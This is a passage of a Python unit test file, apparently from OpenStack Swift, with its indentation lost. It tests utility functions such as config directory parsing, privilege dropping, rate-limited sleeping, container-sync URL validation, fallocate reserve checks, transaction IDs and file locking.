[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
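    # Run func with time and sleep patched so elapsed time is simulated, then
    # check the simulated runtime is within 100ms of target_runtime_ms.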
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
            # make sure it's accurate to a tenth of a second; the time
            # difference is converted to milliseconds (100 ms is 1/10 second)
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
            'Folder3/4.txt',
            'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
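    # human_readable rounds to the nearest power-of-1024 suffix, so 1535
    # bytes is still 1Ki while 1536 rounds up to 2Ki.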
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
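    # config_auto_int_value returns the default for None or 'auto' (case
    # insensitive); anything else must parse as an integer.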
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
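    # Replication quorum is a simple majority: (n // 2) + 1 of n replicas.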
def test_replication_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
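    # rsync_module_interpolation fills {field} placeholders from the device
    # dict; a placeholder with no matching key raises ValueError.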
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
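    # With FALLOCATE_RESERVE set, allocation fails unless the space left
    # after the write would still exceed the reserve.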
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
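        # Taken together, the assertions above imply a transaction id layout
        # of "tx" + 21 hex characters + "-" + 10 hex digits encoding
        # int(time.time()), followed by any caller-supplied suffix.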
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
            self.assertEqual(
                utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
            # unlink the file after it's opened, but only on the first call
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
